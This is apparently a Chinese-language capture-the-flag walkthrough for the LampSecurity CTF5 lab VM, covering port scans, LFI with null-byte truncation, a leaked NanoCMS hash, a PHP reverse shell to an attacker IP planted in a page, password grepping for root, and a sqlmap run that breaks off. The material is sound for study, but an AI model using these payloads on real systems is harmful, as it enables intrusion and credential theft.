Info Gather

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.56.0/24                     
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:38 CST
Nmap scan report for 192.168.56.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.139
Host is up (0.00063s latency).
MAC Address: 00:0C:29:7D:00:15 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00042s latency).
MAC Address: 00:50:56:FE:21:A5 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.08 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:40 CST
Nmap scan report for 192.168.56.139
Host is up (0.0017s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
53728/tcp open  unknown
MAC Address: 00:0C:29:7D:00:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds

开了这么多端口，如此多的可能性。
可能比较好用的攻击向量：80-web, 139&445-samba
然后是：53728，901，25，110，111
剩下其他的最后看。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -p- --min-rate=10000 192.168.56.139                          
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:48 CST
Warning: 192.168.56.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.139
Host is up (0.0014s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
111/udp   open  rpcbind
5353/udp  open  zeroconf
32768/udp open  omad
MAC Address: 00:0C:29:7D:00:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.70 second

都可以看看。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,5353,32768,53728 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:54 CST
Nmap scan report for 192.168.56.139
Host is up (0.00098s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 4.7 (protocol 2.0)
25/tcp    open   smtp        Sendmail 8.14.1/8.14.1
80/tcp    open   http        Apache httpd 2.2.6 ((Fedora))
110/tcp   open   pop3        ipop3d 2006k.101
111/tcp   open   rpcbind     2-4 (RPC #100000)
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open   imap        University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
3306/tcp  open   mysql       MySQL 5.0.45
5353/tcp  closed mdns
32768/tcp closed filenet-tms
53728/tcp open   status      1 (RPC #100024)
MAC Address: 00:0C:29:7D:00:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 192.168.56.139; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:55 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.139
Host is up (0.0014s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.139
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.139:80/?page=contact
|     Form id: 
|     Form action: ?page=contact
|     
|     Path: http://192.168.56.139:80/events/
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node
|     
|     Path: http://192.168.56.139:80/events/?q=user/register
|     Form id: user-register
|     Form action: /events/?q=user/register
|     
|     Path: http://192.168.56.139:80/events/?q=user/password
|     Form id: user-pass
|     Form action: /events/?q=user/password
|     
|     Path: http://192.168.56.139:80/events/?q=event/2009/04/29
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event/2009/04/29
|     
|     Path: http://192.168.56.139:80/events/?q=event/2009/04/29
|     Form id: event-type-filter-form
|     Form action: /events/?q=event/2009/04/29
|     
|     Path: http://192.168.56.139:80/events/?q=event/2009/04/29
|     Form id: user-login-form
|     Form action: /events/?q=event/2009/04/29&destination=event%2F2009%2F04%2F29
|     
|     Path: http://192.168.56.139:80/events/?q=event/2023/04/26/month
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event/2023/04/26/month
|     
|     Path: http://192.168.56.139:80/events/?q=event/2023/04/26/month
|     Form id: event-type-filter-form
|     Form action: /events/?q=event/2023/04/26/month
|     
|     Path: http://192.168.56.139:80/events/?q=event/2023/04/26/month
|     Form id: user-login-form
|     Form action: /events/?q=event/2023/04/26/month&destination=event%2F2023%2F04%2F26%2Fmonth
|     
|     Path: http://192.168.56.139:80/events/?q=event
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event
|     
|     Path: http://192.168.56.139:80/events/?q=event
|     Form id: event-type-filter-form
|     Form action: /events/?q=event
|     
|     Path: http://192.168.56.139:80/events/?q=event
|     Form id: user-login-form
|     Form action: /events/?q=event&destination=event
|     
|     Path: http://192.168.56.139:80/events/?q=event/2023/03/01/month/all/all/1
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event/2023/03/01/month/all/all/1
|     
|     Path: http://192.168.56.139:80/events/?q=event/2023/03/01/month/all/all/1
|     Form id: event-type-filter-form
|     Form action: /events/?q=event/2023/03/01/month/all/all/1
|     
|     Path: http://192.168.56.139:80/events/?q=event/2023/03/01/month/all/all/1
|     Form id: user-login-form
|     Form action: /events/?q=event/2023/03/01/month/all/all/1&destination=event%2F2023%2F03%2F01%2Fmonth%2Fall%2Fall%2F1
|     
|     Path: http://192.168.56.139:80/events/?q=node&destination=node
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|     
|     Path: http://192.168.56.139:80/events/?q=blog
|     Form id: user-login-form
|     Form action: /events/?q=blog&destination=blog
|     
|     Path: http://192.168.56.139:80/events/?q=comment/reply/2
|     Form id: comment-form
|     Form action: /events/?q=comment/reply/2
|     
|     Path: http://192.168.56.139:80/events/?q=comment/reply/2
|     Form id: user-login-form
|     Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|     
|     Path: http://192.168.56.139:80/events/?q=node/2
|     Form id: user-login-form
|     Form action: /events/?q=node/2&destination=node%2F2
|     
|     Path: http://192.168.56.139:80/events/?q=blog/1
|     Form id: user-login-form
|_    Form action: /events/?q=blog/1&destination=blog%2F1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
|   /squirrelmail/images/sm_logo.png: SquirrelMail
|   /icons/: Potentially interesting folder w/ directory listing
|_  /inc/: Potentially interesting folder
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_    http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
901/tcp  open  samba-swat
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:7D:00:15 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 170.56 seconds

http-enum和http-sql-injection部分挺让人感兴趣。之后重点看看。

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo nikto -h 192.168.56.139          
[sudo] password for kali: 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.139
+ Target Hostname:    192.168.56.139
+ Target Port:        80
+ Start Time:         2023-04-26 16:29:26 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ /: Retrieved x-powered-by header: PHP/5.2.4.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpmyadmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Tue Aug 21 10:59:12 2029. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /mail/src/read_body.php: Cookie SQMSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /mail/src/read_body.php: SquirrelMail found.
+ /squirrelmail/src/read_body.php: SquirrelMail found.
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /phpmyadmin/: phpMyAdmin directory found.
+ /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time:           2023-04-26 16:29:51 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploit

RFI（F）

之前nikto中发现/info.php?file=可能存在远程文件包含，实际试了一下发现并不行。

SQLi（F）

再看看sql注入，如果能直接拿到登录凭证那美滋滋。
先sqlmap扫一下[http://192.168.56.139:80/events/?q=event%2Fical](http://192.168.56.139:80/events/?q=event%2Fical)，发现没有注入点。
手动看看发现是下载一个文件。
再sqlmap扫一下[http://192.168.56.139:80/?page=contact](http://192.168.56.139:80/?page=contact)，还是没有注入点。

LFI（F）

直接访问发现报错，报错信息如下

sudo curl 'http://192.168.56.139/?page=../../../../../../../etc/passwd'
<div id="main">

<b>Warning</b>:  include_once(inc/../../../../../../../etc/passwd.php) [<a href='function.include-once'>function.include-once</a>]: failed to open stream: No such file or directory in <b>/var/www/html/index.php</b> on line <b>6</b>



<b>Warning</b>:  include_once() [<a href='function.include'>function.include</a>]: Failed opening 'inc/../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>6</b>

</div>

一眼文件包含漏洞，由于后面有.php，我们之前看phpinfo页面发现此PHP版本存在0字符截断漏洞。直接截断。

# http://192.168.56.139/?page=../../../../../../../etc/passwd%00

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin polkituser:x:87:87:PolicyKit:/:/sbin/nologin avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash andy:x:502:502:Andrew Carp:/home/andy:/bin/bash loren:x:503:503:Loren Felt:/home/loren:/bin/bash amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

可看到/etc/passwd内容，可惜看不到shadow的内容，想看看配置信息啥的无果。先暂时搁置这个漏洞。

Samba（F）

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.139
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 16:54 CST
Nmap scan report for 192.168.56.139
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:7D:00:15 (VMware)

Host script results:
| smb-enum-shares: 
|   account_used: <blank>
|   \\192.168.56.139\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server Version 3.0.26a-6.fc8)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|_    Anonymous access: READ/WRITE
| smb-enum-users: 
|   LOCALHOST\amy (RID: 2008)
|     Full name:   Amy Pendelton
|     Flags:       Normal user account
|   LOCALHOST\andy (RID: 2004)
|     Full name:   Andrew Carp
|     Flags:       Normal user account
|   LOCALHOST\jennifer (RID: 2002)
|     Full name:   Jennifer Sea
|     Flags:       Normal user account
|   LOCALHOST\loren (RID: 2006)
|     Full name:   Loren Felt
|     Flags:       Normal user account
|   LOCALHOST\patrick (RID: 2000)
|     Full name:   Patrick Fair
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds

看看我们的samba服务吧，扫出了各用户名以及共享的地址
再用smbmap扫一下

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ smbmap -H 192.168.56.139                 
[+] IP: 192.168.56.139:445      Name: unknown                                           
Disk        Permissions     Comment
----        -----------     -------
homes       NO ACCESS       Home Directories
IPC$        NO ACCESS       IPC Service (Samba Server Version 3.0.26a-6.fc8)

得，都是NO ACCESS。寄

# Not use
hydra -l andy -P /usr/share/wordlists/rockyou.txt 192.168.56.139 http-post-form "/~andy/data/nanoadmin.php:SQMSESSID=b2pdpdkh3rlkvukqr0jbssur30; PHPSESSID=7rlrvoh72sto2t935mmr4l99e0; SESS100a7dde408e54bc0d12aead519a7cc5=i1u9c4qe9er2gu0r1ou19tqhj1
;user=^USER^&pass=^PASS^:F=wrong Username or Password"


Cookie: SQMSESSID=b2pdpdkh3rlkvukqr0jbssur30; PHPSESSID=7rlrvoh72sto2t935mmr4l99e0; SESS100a7dde408e54bc0d12aead519a7cc5=i1u9c4qe9er2gu0r1ou19tqhj1
Upgrade-Insecure-Requests: 1
user=1111&pass=2222

NanoCMS（S）

在后台登录界面，我们可以发现cms是nanocms，在exp-db上查一下，发现只有一个已登录用户的RCE漏洞。
再在搜索引擎查一查search in bing: nanocms exploit，发现nanoCMS存在一个数据泄露漏洞。

虽然不知道nanocms的版本，但是还是试试吧，死马当活马医。

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ curl http://192.168.56.139/~andy/data/pagesdata.txt
a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:12;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}   

发现竟然爆出了username和password。
直接把md5值的密码丢去破解。

OK
登录后台

OK
四处找了找，发现可以编辑页面的地方，决定隐蔽点在contact页面插个反弹shell。

<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.132/8080 0>&1'") ?>

成功获取shell。

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo nc -lvp 443 
listening on [any] 443 ...
192.168.56.139: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.139] 54757
bash: no job control in this shell
bash-3.2$ whoami
apache
bash-3.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:7d:00:15 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.139/24 brd 192.168.56.255 scope global eth1
    inet6 fe80::20c:29ff:fe7d:15/64 scope link 
       valid_lft forever preferred_lft forever
bash-3.2$

Priv E

sudo -l need password.

find / -type f -perm -04000 -ls 2>/dev/null
没有有价值的，at用了总是失败，其他没有啥能用的。

bash-3.2$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

一个个去定时任务文件夹里看了一遍，研究了下/etc/cron.daily里的一个定时任务，没发现可以利用的东西。

传一下lse.sh上去，执行后发现这个shell不支持颜色显示语法，可读性极差。。。
换成linpeas，发现可以正常显示颜色。还得是他。
可惜还是没有提供特别有用的信息，虽然此系统版本很低，很有可能可以内核提权，但是，太不稳定了，还是不试了。

看了下视频思路：

There so many user in the system that maybe some of them would left credentials in their files. So why not take a try?
多用户环境下，保不齐会有带路党，反正试试不吃亏。

所以我们递归忽略大小写搜一下/home下的文件里的pass字段

# -R recursion -i ignore Cap
grep -R -i pass /home/* 2>/dev/null

/home/andy/public_html/data/admin-design/loginform.php:    <tr><td><?php _lt('Password'); ?></td><td><input type='password' name='pass'></td></tr>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...

# cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>

密码发现，存的还是root密码，离谱。

ash-3.2$ su
su
Password: 50$cent

[root@localhost bin]# whoami
whoami
root
[root@localhost bin]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:7d:00:15 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.139/24 brd 192.168.56.255 scope global eth1
    inet6 fe80::20c:29ff:fe7d:15/64 scope link 
       valid_lft forever preferred_lft forever
[root@localhost bin]#

搞定。

补充

实际上测试SQLi的时候还是不够细，光想着url里的参数了。老惦记那BGET方法干吗。真得想想POST的事吧。
在192.168.56.139/list/页面中，4个form输入框存在SQLi漏洞，加个'试出来了。

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo sqlmap -u http://192.168.56.139/list/ --data 'name=1&email=&phone=&org=' 
        ___
       __H__                                                                                    
 ___ ___["]_____ ___ ___  {1.7.2#stable}                                                        
|_ -| . ["]     | .'| . |                                                                       
|___|_  [)]_|_|_|__,|  _|                                                                       
      |_|V...       |_|   https://sqlmap.org                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:57 /2023-04-27/

[15:16:57] [WARNING] provided value for parameter 'email' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:16:57] [WARNING] provided value for parameter 'phone' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:16:57] [WARNING] provided value for parameter 'org' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:16:57] [INFO] testing connection to the target URL
[15:16:58] [INFO] testing if the target URL content is stable
[15:16:58] [INFO] target URL content is stable
[15:16:58] [INFO] testing if POST parameter 'name' is dynamic
[15:16:58] [WARNING] POST parameter 'name' does not appear to be dynamic
[15:16:58] [INFO] heuristic (basic) test shows that POST parameter 'name' might be injectable (possible DBMS: 'MySQL')
[15:16:58] [INFO] heuristic (XSS) test shows that POST parameter 'name' might be vulnerable to cross-site scripting (XSS) attacks
[15:16:58] [INFO] testing for SQL injection on POST parameter 'name'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:17:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:17:06] [WARNING] reflective value(s) found and filtering out
[15:17:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:17:06] [INFO] testing 'Generic inline queries'
[15:17:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:17:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:17:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:17:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'                                                                                        
[15:17:07] [INFO] POST parameter 'name' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="to")                            
[15:17:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                         
